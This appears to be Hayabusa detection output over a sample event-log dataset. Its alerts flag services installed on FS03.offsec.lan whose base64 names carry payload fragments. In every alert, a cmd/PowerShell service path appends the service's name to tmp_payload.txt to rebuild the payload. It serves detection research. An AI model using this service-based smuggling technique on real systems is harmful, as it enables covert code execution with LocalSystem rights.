2021-11-03 17:19:23.680 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:25.137 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:25.137 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:25.137 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:26.591 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:26.591 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:26.591 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:28.028 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:28.028 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:28.028 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:29.482 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:29.482 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:29.482 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:30.940 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:30.940 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:30.940 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:32.394 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:32.394 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:32.394 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:33.831 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:33.831 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:33.831 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:35.440 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:35.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:35.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:36.895 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:36.895 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:36.895 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:38.333 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:38.333 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:38.333 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:39.787 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:39.787 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:39.787 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:41.247 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:41.247 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
